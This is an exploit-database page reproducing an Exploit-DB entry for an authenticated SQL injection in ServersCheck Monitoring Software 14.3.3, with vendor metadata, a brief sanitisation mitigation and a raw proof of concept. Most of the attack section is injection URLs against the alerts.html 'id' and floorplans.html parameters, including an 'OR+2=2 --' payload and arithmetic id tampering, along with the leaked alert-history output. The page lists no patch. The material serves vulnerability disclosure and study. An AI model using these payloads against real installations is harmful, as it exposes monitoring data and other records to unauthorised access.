header-logo
Suggest Exploit
vendor:
ServersCheck Monitoring Software
by:
John Page (aka hyp3rlinx)
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ServersCheck Monitoring Software
Affected Version From: 14.3.3
Affected Version To: 14.3.3
Patch Exists: NO
Related CWE: N/A
CPE: a:serverscheck:serverscheck_monitoring_software
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2018

ServersCheck Monitoring Software 14.3.3 – ‘id’ SQL Injection

ServersCheck Monitoring Software allows for SQL Injection by an authenticated user via the alerts.html 'id' parameter. An attacker can manipulate the results of the page by using the 'OR+2=2' and '-2' parameters.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection
# Author: John Page (aka hyp3rlinx)	
# Date: 2018-10-23
# Vendor: www.serverscheck.com
# Software link: http://downloads.serverscheck.com/monitoring_software/setup.exe
# CVE: N/A
# References:
# https://serverscheck.com/monitoring-software/release.asp
# http://hyp3rlinx.altervista.org/advisories/CVE-2018-18550-SERVERSCHECK-MONITORING-SOFTWARE-SQL-INJECTION.txt

# Security Issue
# ServersCheck Monitoring Software allows for SQL Injection by an authenticated user 
# via the alerts.html "id" parameter.

# Exploit/POC
http://127.0.0.1:1272/alerts.html?id=18391

Result:
Alerts History for SENSORXY
No data available in table

Then using 'OR+2=2,

http://127.0.0.1:1272/alerts.html?id=18391+'OR+2=2+--+

Result:

Alerts History for test
155 	a day ago 	CPU on 127.0.0.1 	Status Change 	DOWN to OK 	
154 	a day ago 	CPU on 127.0.0.1 	Status Change 	OK to DOWN 	
153 	a day ago 	test 	Status Change 	OK to DOWN 	Unable to connect to host


# SQL Injection - original page results successfully manipulated using 18391-2
# Examples:

http://127.0.0.1:1272/alerts.html?id=18391
No data available in table

Then using 34 minus 2,

http://127.0.0.1:1272/alerts.html?id=18391-2
153 	a day ago 	test 	Status Change 	OK to DOWN 	Unable to connect to host

and minus 1,

http://127.0.0.1:1272/alerts.html?id=18391-1
155 	a day ago 	CPU on 127.0.0.1 	Status Change 	DOWN to OK 	
154 	a day ago 	CPU on 127.0.0.1 	Status Change 	OK to DOWN


http://127.0.0.1:1272/floorplans.html?floorplan=34
Floor Plan PLANXY

Then using 34 minus 2,

http://127.0.0.1:1272/floorplans.html?floorplan=34-2
Floor Plan 0

Navigation

Suggest Exploit

Services By CQR